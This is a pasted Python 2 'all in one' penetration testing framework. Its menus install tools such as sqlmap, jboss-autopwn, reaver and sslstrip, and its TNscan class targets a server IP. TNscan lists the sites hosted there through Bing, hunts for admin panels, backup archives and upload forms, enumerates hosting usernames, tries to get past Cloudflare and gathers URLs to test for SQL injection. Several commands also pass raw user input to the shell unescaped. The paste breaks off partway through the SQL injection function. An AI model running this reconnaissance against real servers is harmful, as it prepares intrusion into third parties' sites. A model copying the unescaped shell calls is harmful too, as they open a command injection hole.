
WE-ARE-ANONY

a guest
Feb 16th, 2016
  1. #!/usr/bin/env python2.7
  2. #
  3. # All In One Tool For Penetration Testing
  4. # Authors : Fedy Wesleti , Mohamed Nour
  5. #
  6. import sys
  7. import os
  8. import time
  9. import httplib
  10. import subprocess
  11. import re, urllib2
  12. import socket
  13. import urllib,sys,json
  14. import telnetlib
  15. import glob
  16. import random
  17. import Queue
  18. import threading
  19. from getpass import getpass
  20. from commands import *
  21. from sys import argv
  22. from platform import system
  23. from urlparse import urlparse
  24. from xml.dom import minidom
  25. from optparse import OptionParser
  26. from time import sleep
  27. ##########################
  28. #Variables
# Accepted answers for the tool's yes/no prompts.  Membership tests are
# case-sensitive: 'Y' is accepted, but 'N', 'YES' and 'No' are not.
yes = {'yes', 'y', 'ye', 'Y'}
no = {'no', 'n'}
def logo():
    """Print the ASCII-art banner with version and author credits.

    Output only; the banner text is identical to the one ``menu`` prints
    before its choice list.
    """
    banner = """
######## ######## ## ## ######## ####### ## ##
## ## ## ### ## ## ## ## ## ## ##
## ## ## #### ## ## ## ## ## ## ##
######## ###### ## ## ## ######## ## ## ###
## ## ## #### ## ## ## ## ## ##
## ## ## ### ## ## ## ## ## ##
## ######## ## ## ######## ####### ## ## v1.2
A Penetration Testing Framework

[+] Coded BY Fedy Wesleti & Mohamed Nour [+]
[+] FB/CEH.TN ~~ FB/mohamed.zeus.0 [+]
[+] Greetz To All Pentesters [+]
"""
    print(banner)
def menu():
    """Print the banner and choice list, then dispatch one top-level choice.

    '99' clears the screen and exits the process.  An empty or unknown
    answer re-displays this menu.  Every other entry calls the matching
    sub-menu; ``tnn`` is a class, so '7' instantiates it.  Sub-menus are
    looked up at call time, so they may be defined later in the file.
    """
    banner = """
######## ######## ## ## ######## ####### ## ##
## ## ## ### ## ## ## ## ## ## ##
## ## ## #### ## ## ## ## ## ## ##
######## ###### ## ## ## ######## ## ## ###
## ## ## #### ## ## ## ## ## ##
## ## ## ### ## ## ## ## ## ##
## ######## ## ## ######## ####### ## ## v1.2
A Penetration Testing Framework

[+] Coded BY Fedy Wesleti & Mohamed Nour [+]
[+] FB/CEH.TN ~~ FB/mohamed.zeus.0 [+]
[+] Greetz To All Pentesters [+]
Select from the menu:
1 : Information Gathering
2 : Password Attacks
3 : Wireless Testing
4 : Exploitation Tools
5 : Sniffing & Spoofing
6 : Web Hacking
7 : Privat Tools
99 : Exit
"""
    print(banner)
    choice = raw_input("Enter Your Choice:")

    if choice == "99":
        clearScr()
        sys.exit()
    submenus = {
        "1": info,
        "2": passwd,
        "3": wire,
        "4": exp,
        "5": snif,
        "6": webhack,
        "7": tnn,
    }
    # Anything not in the table, including an empty answer, loops back here.
    submenus.get(choice, menu)()
def h2ip():
    """Prompt for a hostname and print the IPv4 address it resolves to.

    ``socket.gethostbyname`` raises ``socket.gaierror`` for a name that
    does not resolve; nothing here catches it.
    """
    hostname = raw_input("Select A Host : ")
    print(socket.gethostbyname(hostname))
def ports():
    """Prompt for a target, run ``nmap -O -Pn`` against it, then exit.

    The answer is spliced into the shell command line verbatim, so any
    shell metacharacters in it are interpreted by the shell.  The trailing
    ``sys.exit`` ends the whole program instead of returning to the menu.
    """
    clearScr()
    target = raw_input('Select a Target IP :')
    os.system("nmap -O -Pn {0}".format(target))
    sys.exit()
def ifinurl():
    """Describe Inurlbr and ask whether it is installed.

    A 'yes' answer runs ``inurl`` and then falls through to the main menu
    (the original's trailing ``else`` fires after ``inurl`` returns); every
    other answer, including an empty one, goes straight to the main menu.
    """
    print(""" This Advanced search in search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found.""")
    print('do you have Inurlbr installed ? ')
    cinurl = raw_input("Y / N : ")
    if cinurl in yes:
        inurl()
    # Every path ends in the main menu.
    menu()
def commix():
    """Offer to clone the commix repository.

    'yes' clones it into ./commix; 'no' clears the screen and returns to
    the information menu; any other answer simply returns to the caller.
    """
    print ("Automated All-in-One OS Command Injection and Exploitation Tool.")
    print ("usage : python commix.py --help")
    answer = raw_input("Continue: y/n :")
    if answer in no:
        os.system('clear')
        info()
    elif answer in yes:
        os.system("git clone https://github.com/stasinopoulos/commix.git commix")
  121.  
def pixiewps():
    """Offer to clone and build pixiewps, then return to the main menu.

    'yes' runs the three shell steps below and then falls through to
    ``menu`` (the original's trailing ``else``); every other answer goes
    to ``menu`` directly.  Note that ``cd pixiewps/src & make`` uses a
    single '&': the ``cd`` is backgrounded and ``make`` runs in the
    current directory, not in pixiewps/src.
    """
    print("""Pixiewps is a tool written in C used to bruteforce offline the WPS pin exploiting the low or non-existing entropy of some Access Points, the so-called "pixie dust attack" discovered by Dominique Bongard in summer 2014. It is meant for educational purposes only
""")
    build_steps = (
        "git clone https://github.com/wiire/pixiewps.git",
        " cd pixiewps/src & make ",
        " cd pixiewps/src & sudo make install",
    )
    choicewps = raw_input("Continue ? Y/N : ")
    if choicewps in yes :
        for step in build_steps:
            os.system(step)
    menu()
def webhack():
    """Web-hacking sub-menu.

    Choices 1-5 run the selected tool and, when it returns, fall through to
    the main menu; choice 6 runs ``wpminiscanner`` and returns directly to
    the caller.  '99', an empty answer and anything unknown go to the main
    menu.  ``sqlscan`` and ``wpminiscanner`` are not defined above this
    point in the file; they are resolved when the branch runs.
    """
    for line in (
        "1 : Drupal Hacking ",
        "2 : Inurlbr",
        "3 : Wordpress & Joomla Scanner",
        "4 : Gravity Form Scanner",
        "5 : File Upload Checker",
        "6 : Wordpress Exploit Scanner",
        "99 : Exit",
    ):
        print(line)
    choiceweb = raw_input("Enter Your Choice : ")
    if choiceweb == "6":
        clearScr()
        wpminiscanner()
        return
    if choiceweb == "1":
        clearScr()
        maine()
    elif choiceweb == "2":
        clearScr()
        ifinurl()
    elif choiceweb == '3':
        clearScr()
        wppjmla()
    elif choiceweb == "4":
        clearScr()
        gravity()
    elif choiceweb == "5":
        clearScr()
        sqlscan()
    menu()
def inurl():
    """Run inurlbr with a dork and an output file name, then route by ``cinurl``.

    ``cinurl`` is neither a parameter nor a local of this function; unless
    a module-level name with that spelling exists elsewhere in the file,
    the ``if`` after the command raises NameError.  Both answers are pasted
    into the shell command line unescaped.
    """
    dork = raw_input("select a Dork:")
    output = raw_input("select a file to save :")
    command = "./inurlbr.php --dork '%s' -s %s.txt -q 1,6 -t 1" % (dork, output)
    os.system(command)
    if cinurl in no:
        insinurl()
    else:
        # Covers the empty answer and anything else.
        menu()
def insinurl():
    """Clone SCANNER-INURLBR, install its PHP dependencies and run ``inurl``.

    The ``mv`` step reads ``/SCANNER-INURLBR/inurbr.php`` (absolute path,
    and spelled differently from the ``inurlbr.php`` the ``chmod`` targets),
    so it does not move the file the clone produced.  ``apt-get install``
    runs without ``-y`` and will prompt.
    """
    install_steps = (
        "git clone https://github.com/googleinurl/SCANNER-INURLBR.git",
        "chmod +x SCANNER-INURLBR/inurlbr.php",
        "apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl",
        "mv /SCANNER-INURLBR/inurbr.php inurlbr.php",
    )
    for step in install_steps:
        os.system(step)
    clearScr()
    inurl()
def nmap():
    """Offer to download and build nmap 7.01 from source.

    'yes' runs the shell steps below; 'no' returns to the information
    menu; any other answer (including empty) goes to the main menu.
    Caveats visible in the commands: ``cd nmap-7.01 & ./configure`` uses a
    single '&', so the ``cd`` is backgrounded and the build command runs
    in the current directory, and ``su root`` opens an interactive shell
    that blocks until the user leaves it.
    """
    build_steps = (
        "wget https://nmap.org/dist/nmap-7.01.tar.bz2",
        "bzip2 -cd nmap-7.01.tar.bz2 | tar xvf -",
        "cd nmap-7.01 & ./configure",
        "cd nmap-7.01 & make",
        "su root",
        "cd nmap-7.01 & make install",
    )
    choice7 = raw_input("continue ? Y / N : ")
    if choice7 in yes :
        for step in build_steps:
            os.system(step)
    elif choice7 in no :
        info()
    else:
        menu()
def jboss():
    """Describe jboss-autopwn and offer to clone it.

    'yes' clones the repository and then exits the whole program; 'no'
    clears the screen and returns to the exploitation menu; any other
    answer goes to the main menu.
    """
    os.system('clear')
    for line in (
        "This JBoss script deploys a JSP shell on the target JBoss AS server. Once",
        "deployed, the script uses its upload and command execution capability to",
        "provide an interactive session.",
        "",
        "usage : ./e.sh target_ip tcp_port ",
        "Continue: y/n",
    ):
        print(line)
    choice9 = raw_input("yes / no :")
    if choice9 in yes:
        os.system("git clone https://github.com/SpiderLabs/jboss-autopwn.git")
        sys.exit()
    elif choice9 in no:
        os.system('clear')
        exp()
    else:
        menu()
def sqlmap():
    """Offer to clone sqlmap into ./sqlmap-dev.

    The clone command ends in a stray '& ', so the shell backgrounds the
    ``git clone`` and ``os.system`` returns before it finishes.  'no'
    clears the screen and returns to the information menu; any other
    answer goes to the main menu.
    """
    print ("usage : python sqlmap.py -h")
    choice8 = raw_input("Continue: y/n :")
    if choice8 in no:
        os.system('clear')
        info()
    elif choice8 in yes:
        os.system("git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev & ")
    else:
        menu()
def setoolkit():
    """Describe SET and offer to clone it and run its setup.py.

    'yes' runs the two shell steps and then falls through to the main menu
    (the original's trailing ``else``); 'no' clears the screen and returns
    to the information menu; any other answer goes to the main menu.
    """
    for line in (
        "The Social-Engineer Toolkit is an open-source penetration testing framework",
        ") designed for social engineering. SET has a number of custom attack vectors that ",
        " allow you to make a believable attack quickly. SET is a product of TrustedSec, LLC ",
        "an information security consulting firm located in Cleveland, Ohio.",
        "",
    ):
        print(line)
    choiceset = raw_input("y / n :")
    if choiceset in no:
        clearScr()
        info()
        return
    if choiceset in yes:
        os.system("git clone https://github.com/trustedsec/social-engineer-toolkit.git")
        os.system("python social-engineer-toolkit/setup.py")
    menu()
def cupp():
    """Offer to clone cupp (password-list generator).

    The "downloaded successfully" line is printed whatever ``git clone``
    returned; the exit status is not checked.  'no' clears the screen and
    returns to the password menu; any other answer goes to the main menu.
    """
    print("cupp is a password list generator ")
    print("Usage: python cupp.py -h")
    choicecupp = raw_input("Continue: y/n : ")

    if choicecupp in no:
        clearScr()
        passwd()
    elif choicecupp in yes:
        os.system("git clone https://github.com/Mebus/cupp.git")
        print("file downloaded successfully")
    else:
        menu()
def ncrack():
    """Offer to clone ruby-ncrack.

    Each ``os.system`` call runs in its own shell, so ``cd ruby-ncrack``
    has no effect on the following ``install ruby-ncrack`` command.  'no'
    clears the screen and returns to the password menu; any other answer
    goes to the main menu.
    """
    print("A Ruby interface to Ncrack, Network authentication cracking tool.")
    print("requires : nmap >= 0.3ALPHA / rprogram ~> 0.3")
    print("Continue: y/n")
    steps = (
        "git clone https://github.com/sophsec/ruby-ncrack.git",
        "cd ruby-ncrack",
        "install ruby-ncrack",
    )
    choicencrack = raw_input("y / n :")
    if choicencrack in yes:
        for step in steps:
            os.system(step)
    elif choicencrack in no:
        clearScr()
        passwd()
    else:
        menu()
def reaver():
    """Offer to install the reaver-wps-fork-t6x build dependencies and build it.

    The prompt text says "1 to accept / 0 to decline" but the code tests
    the ``yes``/``no`` sets.  The two ``cd ... & ...`` steps use a single
    '&', so ``./configure`` and ``make`` run in the current directory.
    'no' clears the screen and returns to the wireless menu; any other
    answer goes to the main menu.
    """
    print("""
Reaver has been designed to be a robust and practical attack against Wi-Fi Protected Setup
WPS registrar PINs in order to recover WPA/WPA2 passphrases. It has been tested against a
wide variety of access points and WPS implementations
1 to accept / 0 to decline
""")
    build_steps = (
        "apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng pixiewps",
        "git clone https://github.com/t6x/reaver-wps-fork-t6x.git",
        "cd reaver-wps-fork-t6x/src/ & ./configure",
        "cd reaver-wps-fork-t6x/src/ & make",
    )
    creaver = raw_input("y / n :")
    if creaver in yes:
        for step in build_steps:
            os.system(step)
    elif creaver in no:
        clearScr()
        wire()
    else:
        menu()
def ssls():
    """Offer to clone sslstrip and install python-twisted-web.

    'yes' runs the three shell steps and then falls through to the main
    menu (the original's trailing ``else``); 'no' returns to the sniffing
    menu; any other answer goes to the main menu.
    """
    print("""sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping
attacks.
It requires Python 2.5 or newer, along with the 'twisted' python module.""")
    install_steps = (
        "git clone https://github.com/moxie0/sslstrip.git",
        "sudo apt-get install python-twisted-web",
        "python sslstrip/setup.py",
    )
    cssl = raw_input("y / n :")
    if cssl in no:
        snif()
        return
    if cssl in yes:
        for step in install_steps:
            os.system(step)
    menu()
def unique(seq):
    """Return the elements of *seq* in first-seen order, duplicates dropped.

    Elements must be hashable.  This function is redefined twice more
    below with the same body; the last definition is the one bound when
    the module finishes loading.
    """
    seen = set()
    result = []
    for item in seq:
        if item not in seen:
            seen.add(item)
            result.append(item)
    return result
def bing_all_grabber(s):
    """Return de-duplicated 'http://host/' URLs that Bing lists for IP string *s*.

    Pages through Bing's ``ip:`` search 50 results at a time and scrapes the
    result anchors with a regex.  The same function is defined again,
    identically, near the end of the file; that later definition is the one
    bound at import time.  Because ``page += 50`` sits inside the ``try``, a
    request that keeps raising URLError is retried indefinitely.
    """

    lista = []
    page = 1
    while page <= 101:
        try:
            bing = "http://www.bing.com/search?q=ip%3A" + s + "+&count=50&first=" + str(page)
            openbing = urllib2.urlopen(bing)
            readbing = openbing.read()
            findwebs = re.findall('<h2><a href="(.*?)"', readbing)
            for i in range(len(findwebs)):
                allnoclean = findwebs[i]
                findall1 = re.findall('http://(.*?)/', allnoclean)
                for idx, item in enumerate(findall1):
                    # Substring test, not a prefix test: any host containing
                    # 'www' anywhere keeps its name, all others get 'www.'.
                    if 'www' not in item:
                        findall1[idx] = 'http://www.' + item + '/'
                    else:
                        findall1[idx] = 'http://' + item + '/'
                lista.extend(findall1)

            # Only reached when the request succeeded (see docstring).
            page += 50
        except urllib2.URLError:
            pass

    final = unique(lista)
    return final
def check_gravityforms(sites) :
    """Return the sites whose gravityforms plugin path answers HTTP 403.

    One GET per site.  The local ``import urllib`` is redundant (the module
    is already imported at file level).  The bare ``except:`` swallows every
    exception, including KeyboardInterrupt, so a hung request cannot be
    interrupted cleanly.  Expects each site to end with '/'.
    """
    import urllib
    gravityforms = []
    for site in sites :
        try :
            if urllib.urlopen(site+'wp-content/plugins/gravityforms/gravityforms.php').getcode() == 403 :
                gravityforms.append(site)
        except :
            pass

    return gravityforms
def gravity():
    """Menu entry: list sites on an IP whose gravityforms path returns 403.

    Results are printed only; nothing is returned or saved.
    """
    ip = raw_input('Enter IP : ')
    sites = bing_all_grabber(str(ip))
    gravityforms = check_gravityforms(sites)
    for ss in gravityforms :
        print ss

    print '\n'
    print '[*] Found, ', len(gravityforms), ' gravityforms.'
def shellnoob():
    """Offer to clone ShellNoob and run its ``--install`` step under sudo.

    'yes' runs the three shell steps and then falls through to the main
    menu (the original's trailing ``else``); 'no' returns to the
    exploitation menu; any other answer goes to the main menu.
    """
    print("""Writing shellcodes has always been super fun, but some parts are extremely boring and error prone. Focus only on the fun part, and use ShellNoob!""")
    install_steps = (
        "git clone https://github.com/reyammer/shellnoob.git",
        "mv shellnoob/shellnoob.py shellnoob.py",
        "sudo python shellnoob.py --install",
    )
    cshell = raw_input("Y / N : ")
    if cshell in no:
        exp()
        return
    if cshell in yes:
        for step in install_steps:
            os.system(step)
    menu()
def info():
    """Information-gathering sub-menu.

    Choices 1-3 run the tool and then fall through to the main menu when
    it returns (the original's trailing ``else``); choice 4 runs ``h2ip``
    and returns to the caller; '99' clears the screen and returns to the
    main menu; an empty or unknown answer goes to the main menu.
    """
    for line in (
        "1: nmap ",
        "2: Setoolkit",
        "3: Port Scanning",
        "4: Host To IP",
        "99: Back To Main Menu",
    ):
        print(line)
    choice2 = raw_input("Select from the menu:")
    if choice2 == "4":
        clearScr()
        h2ip()
        return
    if choice2 == "1":
        os.system('clear')
        nmap()
    elif choice2 == "2":
        clearScr()
        setoolkit()
    elif choice2 == "3":
        clearScr()
        ports()
    elif choice2 == "99":
        clearScr()
    menu()
def priv8():
    """Start a TNscan session by instantiating ``tnn`` (the 'Privat Tools' entry)."""
    tnn()
def passwd():
    """Password-attacks sub-menu: '1' cupp, '2' ncrack, '99' back to main menu.

    An empty or unknown answer also returns to the main menu (without
    clearing the screen).
    """
    for line in ("1: cupp ", "2: Ncrack", "99: Back To Main Menu"):
        print(line)
    choice3 = raw_input("Select from the menu:")
    tools = {"1": cupp, "2": ncrack}
    if choice3 in tools:
        clearScr()
        tools[choice3]()
    elif choice3 == "99":
        clearScr()
        menu()
    else:
        menu()
def wire():
    """Wireless-testing sub-menu.

    '1' runs ``reaver`` and then falls through to the main menu when it
    returns (the original's trailing ``else``); '2' runs ``pixiewps`` and
    returns to the caller; '99', empty and unknown answers go to the main
    menu.
    """
    for line in ("1 : reaver ", "2 : pixiewps", "99: Back To The Main Menu"):
        print(line)
    choice4 = raw_input("Select from the menu:")
    if choice4 == "2":
        clearScr()
        pixiewps()
        return
    if choice4 == "1":
        clearScr()
        reaver()
    menu()
def exp():
    """Exploitation-tools sub-menu.

    Choices 1-3 run the tool and then fall through to the main menu when
    it returns (the original's trailing ``else``); '4' runs ``commix`` and
    returns to the caller; '99', empty and unknown answers go to the main
    menu.
    """
    for line in (
        "1 : jboss-autopwn ",
        "2 : sqlmap",
        "3 : Shellnoob",
        "4 : commix",
        "99 : Go Back To Main Menu",
    ):
        print(line)
    choice5 = raw_input("Select from the menu:")
    if choice5 == "4":
        os.system("clear")
        commix()
        return
    if choice5 == "1":
        os.system('clear')
        jboss()
    elif choice5 == "2":
        clearScr()
        sqlmap()
    elif choice5 == "3":
        clearScr()
        shellnoob()
    menu()
def snif():
    """Sniffing & spoofing sub-menu.

    '1' and '2' run the tool and then fall through to the main menu when
    it returns (the original's trailing ``else``); '99' clears the screen
    first; empty and unknown answers go to the main menu directly.
    """
    for line in ("1 : Setoolkit ", "2 : Ssltrip", "99: Back To Main Menu"):
        print(line)
    choice6 = raw_input("Select from the menu:")
    if choice6 == "1":
        clearScr()
        setoolkit()
    elif choice6 == "2":
        clearScr()
        ssls()
    elif choice6 == "99":
        clearScr()
    menu()
def win():
    """Refuse to run on Windows: clear the screen, explain, exit the process."""
    clearScr()
    notice = "Our Tool Does Not Support Windows , run it on linux or install a virtual machine "
    print(notice)
    sys.exit()
  459. #Check use OS
def OS():
    """Ask which operating system the tool is running on and route accordingly.

    '2' (Linux) goes straight to the main menu, '1' (Mac OSX) goes through
    the root check, '3' (Windows) prints the unsupported notice and exits,
    an empty answer re-prompts, anything else exits the process.  The
    original stored the answer in a local named ``system``, shadowing
    ``platform.system`` inside this function; it is renamed here.
    """
    prompt = """
Choose Operating System :
1) Mac OSX
2) Linux
3) Windows
"""
    print(prompt)
    answer = raw_input("choose an OS : ")
    if answer == "1":
        root()
    elif answer == "2":
        menu()
    elif answer == "3":
        win()
    elif answer == "":
        OS()
    else:
        sys.exit()
def root():
    """Continue to the main menu only when running as uid 0; otherwise exit.

    Uses the ``site``-provided ``exit()`` builtin rather than ``sys.exit``.
    """
    if os.getuid() == 0:
        menu()
        return
    print("Are you root? Please execute as root")
    exit()
# Choice list for the per-server TNscan session; printed by TNscan.__init__.
menuu = '''
1) Get all websites
2) Get joomla websites
3) Get wordpress websites
4) Find control panel
5) Find zip files
6) Find upload files
7) Get server users
8) Scan from SQL injection
9) Scan ports (range of ports)
10) Scan ports (common ports)
11) Get server banner
12) Bypass Cloudflare
99) Exit
'''
def unique(seq):
    """Return *seq* with duplicates removed, preserving first-seen order.

    Elements must be hashable.  Second of three identical definitions in
    this file; the last one wins at import time.
    """
    seen = set()
    result = []
    for item in seq:
        if item in seen:
            continue
        seen.add(item)
        result.append(item)
    return result
def clearScr() :
    """Clear the terminal: 'clear' on GNU/Linux, 'cls' on Windows.

    Any other platform name (e.g. Darwin) is left untouched.  ``system``
    is ``platform.system`` imported at module level.
    """
    commands = {'Linux': 'clear', 'Windows': 'cls'}
    cmd = commands.get(system())
    if cmd is not None:
        os.system(cmd)
class TNscan : #TNscan Function menu
    """Interactive per-server reconnaissance menu (Python 2 only).

    ``serverip`` is the address every probe targets.  All results are
    printed; nothing is returned or persisted.  Each probe is an ordinary
    HTTP request or TCP connect against the target, so the whole session
    is visible in the target's web-server and firewall logs.
    """
    def __init__(self, serverip) :
        """Grab the site list for *serverip* once, then loop on ``menuu``.

        The loop ends only through ``exit()`` when the continue prompt is
        answered with something starting with 'N'.  ``con[0]`` raises
        IndexError on an empty answer.
        """
        self.serverip = serverip
        # Populate self.sites up front; most menu entries read it.
        self.getSites(False)
        print menuu
        while True :
            choice = raw_input(' Enter choice -> ')
            if choice == '1' :
                self.getSites(True)
            elif choice == '2' :
                self.getJoomla()
            elif choice == '3' :
                self.getWordpress()
            elif choice == '4' :
                self.findPanels()
            elif choice == '5' :
                self.findZip()
            elif choice == '6' :
                self.findUp()
            elif choice == '7' :
                self.getUsers()
            elif choice == '8' :
                self.grabSqli()
            elif choice == '9' :
                ran = raw_input(' Enter range of ports, (ex : 1-1000) -> ')
                self.portScanner(1, ran)
            elif choice == '10' :
                self.portScanner(2, None)
            elif choice == '11' :
                self.getServerBanner()
            elif choice == '12' :
                self.cloudflareBypasser()
            elif choice == '99' :
                # If menu() returns, control comes back into this loop.
                menu()
            con = raw_input(' Continue [Y/n] -> ')
            if con[0].upper() == 'N' :
                exit()
            else :
                clearScr()
                print menuu
    def getSites(self, a) :
        """Collect the hostnames Bing associates with ``self.serverip``.

        Pages through Bing's ``ip:`` search 50 results at a time and stores
        the de-duplicated 'http://host/' list in ``self.sites``.  When *a*
        is true the list is also printed.  The printed count is
        ``len(lista)`` (before de-duplication), not ``len(self.sites)``.
        ``page += 50`` is inside the ``try``: a request that keeps raising
        URLError is retried indefinitely.
        """
        lista = []
        page = 1
        while page <= 101:
            try:
                bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+&count=50&first=" + str(page)
                openbing = urllib2.urlopen(bing)
                readbing = openbing.read()
                findwebs = re.findall('<h2><a href="(.*?)"', readbing)
                for i in range(len(findwebs)):
                    allnoclean = findwebs[i]
                    findall1 = re.findall('http://(.*?)/', allnoclean)
                    for idx, item in enumerate(findall1):
                        # Substring test, not a prefix test.
                        if 'www' not in item:
                            findall1[idx] = 'http://www.' + item + '/'
                        else:
                            findall1[idx] = 'http://' + item + '/'
                    lista.extend(findall1)

                page += 50
            except urllib2.URLError:
                pass
        self.sites = unique(lista)
        if a :
            clearScr()
            print '[*] Found ', len(lista), ' Website\n'
            for site in self.sites :
                print site
    def getWordpress(self) :
        """Print sites on the server whose Bing results contain ``?page_id=``.

        Same Bing paging loop as ``getSites``.  The bare ``except:`` hides
        every error, and because ``page += 50`` is inside the ``try`` a
        failing request is retried indefinitely.  Results are printed, not
        stored on the instance.
        """
        lista = []
        page = 1
        while page <= 101:
            try:
                bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+?page_id=&count=50&first=" + str(page)
                openbing = urllib2.urlopen(bing)
                readbing = openbing.read()
                findwebs = re.findall('<h2><a href="(.*?)"', readbing)
                for i in range(len(findwebs)):
                    wpnoclean = findwebs[i]
                    findwp = re.findall('(.*?)\?page_id=', wpnoclean)
                    lista.extend(findwp)
                page += 50
            except:
                pass
        lista = unique(lista)
        clearScr()
        print '[*] Found ', len(lista), ' Wordpress Website\n'
        for site in lista :
            print site
    def getJoomla(self) :
        """Print sites on the server whose Bing results contain ``index.php?option=com``.

        No exception handling: a failed request propagates out of the
        ``__init__`` loop and ends the program with a traceback.  The
        regex ``'(.*?)index.php'`` leaves the '.' unescaped.
        """
        lista = []
        page = 1
        while page <= 101:
            bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+index.php?option=com&count=50&first=" + str(page)
            openbing = urllib2.urlopen(bing)
            readbing = openbing.read()
            findwebs = re.findall('<h2><a href="(.*?)"', readbing)
            for i in range(len(findwebs)):
                jmnoclean = findwebs[i]
                findjm = re.findall('(.*?)index.php', jmnoclean)
                lista.extend(findjm)
            page += 50
        lista = unique(lista)
        clearScr()
        print '[*] Found ', len(lista), ' Joomla Website\n'
        for site in lista :
            print site
    ############################
    #find admin panels
    def findPanels(self) :
        """Print ``site + path`` for every pair that answers HTTP 200.

        Issues one GET per site in ``self.sites`` per entry of ``adminList``
        (len(sites) * len(adminList) requests).  ``IOError`` (what ``urllib``
        raises for network failures) is ignored; other exceptions propagate.
        """
        print "[~] Finding admin panels"
        adminList = ['admin/', 'site/admin', 'admin.php/', 'up/admin/', 'central/admin/', 'whm/admin/', 'whmcs/admin/', 'support/admin/', 'upload/admin/', 'video/admin/', 'shop/admin/', 'shoping/admin/', 'wp-admin/', 'wp/wp-admin/', 'blog/wp-admin/', 'admincp/', 'admincp.php/', 'vb/admincp/', 'forum/admincp/', 'up/admincp/', 'administrator/', 'administrator.php/', 'joomla/administrator/', 'jm/administrator/', 'site/administrator/', 'install/', 'vb/install/', 'dimcp/', 'clientes/', 'admin_cp/', 'login/', 'login.php', 'site/login', 'site/login.php', 'up/login/', 'up/login.php', 'cp.php', 'up/cp', 'cp', 'master', 'adm', 'member', 'control', 'webmaster', 'myadmin', 'admin_cp', 'admin_site']
        clearScr()
        for site in self.sites :
            for admin in adminList :
                try :
                    if urllib.urlopen(site + admin).getcode() == 200 :
                        print " [*] Found admin panel -> ", site + admin
                except IOError :
                    pass
    ############################
    #find ZIP files
    def findZip(self) :
        """Print ``site + name`` for every archive name that answers HTTP 200.

        Same request pattern and error handling as ``findPanels``.
        """
        zipList = ['backup.tar.gz', 'backup/backup.tar.gz', 'backup/backup.zip', 'vb/backup.zip', 'site/backup.zip', 'backup.zip', 'backup.rar', 'backup.sql', 'vb/vb.zip', 'vb.zip', 'vb.sql', 'vb.rar', 'vb1.zip', 'vb2.zip', 'vbb.zip', 'vb3.zip', 'upload.zip', 'up/upload.zip', 'joomla.zip', 'joomla.rar', 'joomla.sql', 'wordpress.zip', 'wp/wordpress.zip', 'blog/wordpress.zip', 'wordpress.rar']
        clearScr()
        print "[~] Finding zip file"
        for site in self.sites :
            for zip1 in zipList :
                try:
                    if urllib.urlopen(site + zip1).getcode() == 200 :
                        print " [*] Found zip file -> ", site + zip1
                except IOError :
                    pass
    ############################
    #find upload directories
    def findUp(self) :
        """Print pages from ``upList`` that answer 200 and contain 'type=file'.

        Each hit is fetched twice (once for the status code, once for the
        body).  A page is printed once per matching line, so it may appear
        several times.  ``IOError`` is ignored; other exceptions propagate.
        """
        upList = ['up.php', 'up1.php', 'up/up.php', 'site/up.php', 'vb/up.php', 'forum/up.php','blog/up.php', 'upload.php', 'upload1.php', 'upload2.php', 'vb/upload.php', 'forum/upload.php', 'blog/upload.php', 'site/upload.php', 'download.php']
        clearScr()
        print "[~] Finding Upload"
        for site in self.sites :
            for up in upList :
                try :
                    if (urllib.urlopen(site + up).getcode() == 200) :
                        html = urllib.urlopen(site + up).readlines()
                        for line in html :
                            if re.findall('type=file', line) :
                                print " [*] Found upload -> ", site+up
                except IOError :
                    pass
    ############################
    #find users
    def getUsers(self) :
        """Derive a candidate account name from each hostname and probe it.

        Strips the scheme, dots, dashes and slashes from the site name, then
        shortens the string one character at a time, requesting
        ``/cgi-sys/guestbook.cgi?user=<name>`` until a response without
        'invalid username' is seen.  Every non-matching candidate is
        printed as well.  The bare ``except:`` hides all errors per site.
        """
        clearScr()
        print "[~] Grabbing Users"
        userslist = []
        for site1 in self.sites :
            try:
                site = site1
                site = site.replace('http://www.', '')
                site = site.replace('http://', '')
                site = site.replace('.', '')
                if '-' in site:
                    site = site.replace('-', '')
                site = site.replace('/', '')
                while len(site) > 2:
                    resp = urllib2.urlopen(site1 + '/cgi-sys/guestbook.cgi?user=%s' % site).read()
                    if 'invalid username' not in resp.lower():
                        print '\t [*] Found -> ', site
                        userslist.append(site)
                        break
                    else :
                        print site

                    site = site[:-1]
            except:
                pass

        clearScr()
        for user in userslist :
            print user
    ############################
    #bypass cloudflare
    def cloudflareBypasser(self) :
        """Resolve common sub-domains of each site and compare with its A record.

        Defect: ``str.replace`` returns a new string and the two results at
        the top of the loop are discarded, so ``site`` keeps its 'http://'
        prefix and trailing '/'.  Such a string is not a resolvable host
        name, so in practice both ``gethostbyname`` calls raise
        ``socket.error`` and are swallowed; ``ip`` is never bound on the
        first iteration and only the ' [~] Trying' lines are printed.
        """
        clearScr()
        print "[~] Bypassing cloudflare"
        subdoms = ['mail', 'webmail', 'ftp', 'direct', 'cpanel']
        for site in self.sites :
            # Return values unused: these two lines have no effect.
            site.replace('http://', '')
            site.replace('/', '')
            try:
                ip = socket.gethostbyname(site)
            except socket.error:
                pass
            for sub in subdoms:
                doo = sub + '.' + site
                print ' [~] Trying -> ', doo
                try:
                    ddd = socket.gethostbyname(doo)
                    if ddd != ip:
                        print ' [*] Cloudflare bypassed -> ', ddd
                        break
                except socket.error :
                    pass
    ############################
    #find the server banner
    def getServerBanner(self) :
        """GET ``http://<serverip>`` and print its ``Server`` response header.

        Uses the Python 2 ``mimetools`` ``headers.getheader`` API.  Any
        failure is silently ignored by the bare ``except:``.
        """
        clearScr()
        try:
            s = 'http://' + self.serverip
            httpresponse = urllib.urlopen(s)
            print ' [*] Server header -> ', httpresponse.headers.getheader('server')
        except:
            pass
    ############################
    #greb the sqli
    def grabSqli(self) :
        """Collect Bing results containing ``php?id=`` for the server and hand them to ``checkSqli``.

        Unlike ``getSites``, ``page += 50`` is outside the ``try`` here, so a
        failing request skips that page instead of retrying it.  The bare
        ``except:`` hides the failure.
        """
        page = 1
        lista = []
        while page <= 101:
            try:
                bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+php?id=&count=50&first=" + str(page)
                openbing = urllib2.urlopen(bing)
                readbing = openbing.read()
                findwebs = re.findall('<h2><a href="(.*?)"', readbing)
                for i in range(len(findwebs)):
                    x = findwebs[i]
